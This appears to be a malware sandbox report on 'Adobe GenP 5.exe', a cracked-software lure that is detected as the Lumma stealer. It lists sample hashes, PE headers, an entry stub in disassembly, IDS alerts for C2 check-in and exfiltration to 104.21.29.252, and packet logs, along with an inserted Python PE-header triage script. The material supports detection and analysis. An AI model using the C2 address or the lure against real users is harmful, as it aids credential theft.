a0e9f5d64349fb13191bc781f81f42e1 | iviewers.dll | malicious | LummaC | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | Collapse.exe | malicious | LummaC | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC Stealer | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | AxoPac.exe | malicious | LummaC | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | 'Set-up.exe | malicious | LummaC | 104.21.29.252
a0e9f5d64349fb13191bc781f81f42e1 | setup.exe | malicious | LummaC | 104.21.29.252
No context
                                                                                  No created / dropped files found
                                                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Entropy (8bit):6.569633473475677
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Adobe GenP 5.exe
                                                                                  File size:14'820'352 bytes
                                                                                  MD5:9cce9d11869e1568a959515cd688f1f9
                                                                                  SHA1:98e048ba68a2aa5b2640f768dea8a6c6a4eb060c
                                                                                  SHA256:8a83820f2b3d79812bf39f4171d7d70d44b4d7a137c0aa1603f7e195dfc5210f
                                                                                  SHA512:cb5caabe0fa3bb7cf87351ca04e87fbc02e28b538867cf181d66687de8be95a8ad46cae2f22dccc2ee04e7029d8b4b8251b49b017009f5ce6a7e58546a540147
                                                                                  SSDEEP:98304:AXtPdrxHwuf+HtWUOVZZB3wUi7cheilI1ei/sktpGJz5vo:Wnr+tWxjZBgUi74ktpGJz5
                                                                                  TLSH:42E68E50B6A7F8B5C25306F7044B0129B734EC8C6A148951F98CFA6CF7B2F65B4B2A35
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................)..6......PN........U...@..........................`......g}....@................................
                                                                                  Icon Hash:0f42e0e8e4c040a0
                                                                                  Entrypoint:0x464e50
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:1
                                                                                  File Version Major:6
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
                                                                                  Instruction
                                                                                  jmp 00007F9B089B99C0h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                  sub esp, 28h
                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                  mov dword ptr [esp+10h], ebp
                                                                                  mov dword ptr [esp+14h], esi
                                                                                  mov dword ptr [esp+18h], edi
                                                                                  mov esi, eax
                                                                                  mov edx, dword ptr fs:[00000014h]
                                                                                  cmp edx, 00000000h
                                                                                  jne 00007F9B089BBCF9h
                                                                                  mov eax, 00000000h
                                                                                  jmp 00007F9B089BBD56h
                                                                                  mov edx, dword ptr [edx+00000000h]
                                                                                  cmp edx, 00000000h
                                                                                  jne 00007F9B089BBCF7h
                                                                                  call 00007F9B089BBDE9h
                                                                                  mov dword ptr [esp+20h], edx
                                                                                  mov dword ptr [esp+24h], esp
                                                                                  mov ebx, dword ptr [edx+18h]
                                                                                  mov ebx, dword ptr [ebx]
                                                                                  cmp edx, ebx
                                                                                  je 00007F9B089BBD0Ah
                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                  mov dword ptr [ebp+00000000h], ebx
                                                                                  mov edi, dword ptr [ebx+1Ch]
                                                                                  sub edi, 28h
                                                                                  mov dword ptr [edi+24h], esp
                                                                                  mov esp, edi
                                                                                  mov ebx, dword ptr [ecx]
                                                                                  mov ecx, dword ptr [ecx+04h]
                                                                                  mov dword ptr [esp], ebx
                                                                                  mov dword ptr [esp+04h], ecx
                                                                                  mov dword ptr [esp+08h], edx
                                                                                  call esi
                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                  mov esp, dword ptr [esp+24h]
                                                                                  mov edx, dword ptr [esp+20h]
                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                  mov dword ptr [ebp+00000000h], edx
                                                                                  mov edi, dword ptr [esp+18h]
                                                                                  mov esi, dword ptr [esp+14h]
                                                                                  mov ebp, dword ptr [esp+10h]
                                                                                  mov ebx, dword ptr [esp+1Ch]
                                                                                  add esp, 28h
                                                                                  retn 0004h
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                  mov edx, dword ptr [ecx]
                                                                                  mov eax, esp
Name | Virtual address | Virtual size | Is in section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdf0000 | 0x3dc | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe14000 | 0x412a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xdf1000 | 0x21ac0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x560660 | 0xa0 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual address | Virtual size | Raw size | MD5 | Xored PE | ZLIB complexity | File type | Entropy | Characteristics
.text | 0x1000 | 0x29f545 | 0x29f600 | f14e48f7a797fa1bbe4f3f0e2f6d94b1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2a1000 | 0x2bd1fc | 0x2bd200 | eb579c62a5b1d2909ba79696bedddf45 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x55f000 | 0x890228 | 0x862200 | 286aa978e6ebb31fef951f56b98a82d4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xdf0000 | 0x3dc | 0x400 | 2a3e82e76cbe9aa150cbc3daef96d04e | False | 0.4873046875 | data | 4.597883782143737 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0xdf1000 | 0x21ac0 | 0x21c00 | be2139855029bfc5b05153ff9dc7f084 | False | 0.5820384837962963 | data | 6.630531076404684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0xe13000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xe14000 | 0x412a0 | 0x41400 | 898e3bcb4e48ddc3e11daa3de7454f65 | False | 0.3349459710249042 | data | 5.36012129893166 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
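The static signals in the tables above (entry point inside .text, zero build timestamp, no SECURITY directory so no Authenticode signature, DEBUG_STRIPPED set, DYNAMIC_BASE/NX_COMPAT present, and a section name outside the usual linker set) all come straight from the PE headers. The following is an added example, not Joe Sandbox code: it serializes a PE32 header in memory using the values the report lists and parses it back with a minimal header parser to derive the same triage signals. Only headers are constructed, so per-section MD5 and entropy are out of scope; the section characteristics flags and the stack/heap sizes in the builder are placeholders, and the report's entry point 0x464e50 is treated as a VA (image base 0x400000 plus RVA 0x64e50), which is how it lands inside .text.

```python
"""Static PE32 header triage, reproducing the signals from the report's static tables.

Added example; not Joe Sandbox code. build_headers() constructs a header from values
the report lists; parse_headers()/triage() read them back the way a triage script would
read a real file's first few kilobytes.
"""
import struct

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".reloc",
                     ".rsrc", ".bss", ".tls", ".pdata", ".xdata", ".CRT"}
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
             0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
IMAGE_FILE_DEBUG_STRIPPED = 0x0200
DIR_SECURITY = 4  # data directory index of the Authenticode signature

# (name, virtual address, virtual size, raw size) taken from the report's section table
REPORT_SECTIONS = [
    (".text", 0x1000, 0x29F545, 0x29F600),
    (".rdata", 0x2A1000, 0x2BD1FC, 0x2BD200),
    (".data", 0x55F000, 0x890228, 0x862200),
    (".idata", 0xDF0000, 0x3DC, 0x400),
    (".reloc", 0xDF1000, 0x21AC0, 0x21C00),
    (".symtab", 0xE13000, 0x4, 0x200),
    (".rsrc", 0xE14000, 0x412A0, 0x41400),
]


def build_headers(sections, entry_rva=0x64E50, image_base=0x400000, timestamp=0,
                  characteristics=0x0002 | 0x0100 | IMAGE_FILE_DEBUG_STRIPPED, dll_chars=0x8140):
    """Serialize DOS header, PE signature, COFF header, PE32 optional header, section headers.
    Defaults mirror the report: entry VA 0x464e50, timestamp 0, EXECUTABLE|32BIT|DEBUG_STRIPPED,
    DllCharacteristics DYNAMIC_BASE|NX_COMPAT|TERMINAL_SERVER_AWARE (0x8140)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    opt_size = 96 + 16 * 8                                      # PE32 fields + 16 data directories
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, characteristics)
    opt = struct.pack("<HBB" + "I" * 9, 0x10B, 0, 0, 0, 0, 0,
                      entry_rva, 0x1000, 0x2A1000, image_base, 0x1000, 0x200)
    opt += struct.pack("<" + "H" * 6, 6, 1, 6, 1, 6, 1)        # OS, image, subsystem versions 6.1
    opt += struct.pack("<IIII", 0, 0xE56000, 0x400, 0)         # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
    opt += struct.pack("<HH", 2, dll_chars)                     # IMAGE_SUBSYSTEM_WINDOWS_GUI, DllCharacteristics
    opt += struct.pack("<IIIIII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)  # stack/heap placeholders, 16 dirs
    dirs = [(0, 0)] * 16                                        # SECURITY (index 4) stays empty: unsigned
    dirs[1], dirs[2] = (0xDF0000, 0x3DC), (0xE14000, 0x412A0)   # IMPORT, RESOURCE
    dirs[5], dirs[12] = (0xDF1000, 0x21AC0), (0x560660, 0xA0)   # BASERELOC, IAT
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    raw_ptr, sec_hdrs = 0x400, b""
    for name, va, vsize, raw in sections:                       # section flags are a placeholder here
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, raw, raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr += raw
    return dos + b"PE\0\0" + coff + opt + sec_hdrs


def parse_headers(buf):
    """Minimal PE32 parser; raises ValueError on non-PE input or a PE32+ (64-bit) image."""
    if buf[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, pe_off + 4)
    opt = pe_off + 24                                           # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry, _, _, image_base = struct.unpack_from("<IIII", buf, opt + 16)   # EntryPoint, BaseOfCode, BaseOfData, ImageBase
    subsystem, dll_chars = struct.unpack_from("<HH", buf, opt + 68)
    ndirs = struct.unpack_from("<I", buf, opt + 92)[0]
    dirs = [struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, raw, _, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize, "raw": raw, "flags": flags})
    return {"machine": machine, "timestamp": ts, "characteristics": chars, "entry": entry,
            "image_base": image_base, "subsystem": subsystem, "dll_chars": dll_chars,
            "dirs": dirs, "sections": sections}


def triage(buf):
    """Derive the report's static signals: entry section, zeroed build time, Authenticode
    presence, DEBUG_STRIPPED, enabled mitigations and section names outside the usual set."""
    pe = parse_headers(buf)
    entry_sec = next((s["name"] for s in pe["sections"]
                      if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], s["raw"])), None)
    return {
        "entry_section": entry_sec,
        "entry_va": pe["image_base"] + pe["entry"],
        "timestamp_zeroed": pe["timestamp"] == 0,
        "digitally_signed": pe["dirs"][DIR_SECURITY][1] != 0,
        "debug_stripped": bool(pe["characteristics"] & IMAGE_FILE_DEBUG_STRIPPED),
        "mitigations": sorted(n for bit, n in DLL_FLAGS.items() if pe["dll_chars"] & bit),
        "nonstandard_sections": [s["name"] for s in pe["sections"] if s["name"] not in STANDARD_SECTIONS],
    }


if __name__ == "__main__":
    for key, value in triage(build_headers(REPORT_SECTIONS)).items():
        print(f"{key:22} {value}")
```

On a real sample, read the first 4 KiB of the file and pass it to triage() directly; everything it needs sits inside SizeOfHeaders. Treat the non-standard-section signal as a hint rather than a verdict: a `.symtab` section together with a zero timestamp is also what an ordinary Go-linked PE carries, so it is the combination with the behavioural findings above (injection into BitLockerToGo.exe, the C2 traffic) that makes this file malicious, not the header layout alone.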
Name | RVA | Size | Type | Language | Country | ZLIB complexity
RT_ICON | 0xe14184 | 0x40768 | Device independent bitmap graphic, 256 x 500 x 32, image size 256000 | | | 0.3333320708983487
RT_GROUP_ICON | 0xe548ec | 0x14 | data | | | 1.2
RT_VERSION | 0xe54900 | 0x374 | data | | | 0.43891402714932126
RT_MANIFEST | 0xe54c74 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
DLL | Imports
kernel32.dll | WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source port | Dest IP | Dest port | Protocol
2024-12-24T02:56:31.907057+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49725 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:33.011243+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49725 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:33.011243+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49725 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:34.245323+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49736 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:35.029159+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49736 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:35.029159+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49736 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:36.612569+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49742 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:37.510301+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49742 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:39.234144+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49748 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:43.540784+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49759 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:46.356781+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49765 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:48.876162+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49771 | 104.21.29.252 | 443 | TCP
2024-12-24T02:56:52.541408+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49781 | 104.21.29.252 | 443 | TCP
2024-12-24T02:57:00.470768+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49781 | 104.21.29.252 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 02:56:30.689531088 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:30.689578056 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:30.689654112 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:30.690819025 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:30.690835953 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:31.906970024 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:31.907057047 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:31.931040049 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:31.931058884 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:31.931257010 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:31.972542048 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:32.265635967 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:32.265672922 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:32.265707016 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:33.011248112 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:33.011318922 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:33.011445045 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:33.016627073 CET | 49725 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:33.016640902 CET | 443 | 49725 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:33.031878948 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:33.031905890 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:33.032005072 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:33.032958031 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:33.032982111 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:34.245105982 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:34.245322943 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:34.246635914 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:34.246644974 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:34.246968985 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:34.248270035 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:34.248296022 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:34.248343945 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.029165983 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.029567957 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.029669046 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.029731035 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.030335903 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.030487061 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.030503035 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.039799929 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.039890051 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.039906979 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.048103094 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.048151970 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.048157930 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.097558022 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.097574949 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.144407034 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.148699999 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.191446066 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.221069098 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.225117922 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.225270987 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.225302935 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.225347042 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.225374937 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.225404978 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.225436926 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.225599051 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.225629091 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.225652933 CET | 49736 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.225665092 CET | 443 | 49736 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.397927999 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.398044109 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:35.398135900 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.398471117 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:35.398508072 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:36.612453938 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:36.612569094 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:36.614053011 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:36.614065886 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:36.614389896 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:36.615530968 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:36.615673065 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:36.615710974 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:37.510270119 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:37.510373116 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:37.510437012 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:37.513070107 CET | 49742 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:37.513103008 CET | 443 | 49742 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:38.019917011 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:38.020005941 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:38.020104885 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:38.020440102 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:38.020478010 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:39.234057903 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:39.234143972 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:39.235305071 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:39.235326052 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:39.235650063 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:39.236694098 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:39.236852884 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:39.236893892 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:39.236953974 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:39.279382944 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:42.099302053 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:42.099406958 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:42.099466085 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:42.101422071 CET | 49748 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:42.101454973 CET | 443 | 49748 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:42.324596882 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:42.324639082 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
